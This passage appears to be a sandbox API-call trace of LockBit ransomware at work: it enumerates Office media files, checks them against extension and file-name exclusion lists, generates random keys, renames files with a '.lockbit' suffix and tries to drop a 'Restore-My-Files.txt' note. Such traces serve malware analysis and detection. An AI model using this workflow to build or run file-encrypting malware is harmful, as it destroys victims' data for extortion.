lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.928] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.929] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.929] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18200_.WMF") returned 1 [0199.929] lstrcmpiW (lpString1="ntldr", lpString2="BD18200_.WMF") returned 1 [0199.929] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18200_.WMF") returned 1 [0199.929] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18200_.WMF") returned 1 [0199.929] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18200_.WMF") returned -1 [0199.929] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18200_.WMF") returned 1 [0199.929] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18200_.WMF") returned 1 [0199.929] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.930] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF") returned=".WMF" [0199.930] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.930] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.930] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.931] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.931] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF.lockbit") returned 79 [0199.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18200_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0199.932] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.932] malloc (_Size=0x40068) returned 0x3d70450 [0199.932] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1564) returned 1 [0199.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.932] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0199.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0199.933] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.936] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.936] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.937] free (_Block=0x1fa2ed8) [0199.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18200_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.937] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.938] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3c3c400, ftCreationTime.dwHighDateTime=0x1bdcf1f, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd3c3c400, ftLastWriteTime.dwHighDateTime=0x1bdcf1f, nFileSizeHigh=0x0, nFileSizeLow=0x6ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18201_.WMF", cAlternateFileName="")) returned 1 [0199.938] lstrcmpiW (lpString1=".", lpString2="BD18201_.WMF") returned -1 [0199.938] lstrcmpiW (lpString1="..", lpString2="BD18201_.WMF") returned -1 [0199.938] PathFindExtensionW (pszPath="BD18201_.WMF") returned=".WMF" [0199.938] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.938] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.939] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.939] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18201_.WMF") returned 1 [0199.940] lstrcmpiW (lpString1="ntldr", lpString2="BD18201_.WMF") returned 1 [0199.940] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18201_.WMF") returned 1 [0199.940] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18201_.WMF") returned 1 [0199.940] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18201_.WMF") returned -1 [0199.940] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18201_.WMF") returned 1 [0199.940] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18201_.WMF") returned 1 [0199.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF") returned=".WMF" [0199.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.940] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.940] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.941] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.941] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF.lockbit") returned 79 [0199.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18201_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.945] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.945] malloc (_Size=0x40068) returned 0x3f70048 [0199.945] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=1772) returned 1 [0199.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.945] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.946] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.948] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.948] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.949] free (_Block=0x1fa2ed8) [0199.949] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18201_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.949] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.949] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.949] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6adbc800, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcbb3900, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6adbc800, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x56c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18202_.WMF", cAlternateFileName="")) returned 1 [0199.949] lstrcmpiW (lpString1=".", lpString2="BD18202_.WMF") returned -1 [0199.949] lstrcmpiW (lpString1="..", lpString2="BD18202_.WMF") returned -1 [0199.949] PathFindExtensionW (pszPath="BD18202_.WMF") returned=".WMF" [0199.949] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.949] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.950] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.950] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18202_.WMF") returned 1 [0199.951] lstrcmpiW (lpString1="ntldr", lpString2="BD18202_.WMF") returned 1 [0199.951] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18202_.WMF") returned 1 [0199.951] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18202_.WMF") returned 1 [0199.951] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18202_.WMF") returned -1 [0199.951] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18202_.WMF") returned 1 [0199.951] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18202_.WMF") returned 1 [0199.951] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.951] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF") returned=".WMF" [0199.951] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.951] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.951] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.952] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.952] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF.lockbit") returned 79 [0199.952] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18202_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18202_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.953] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 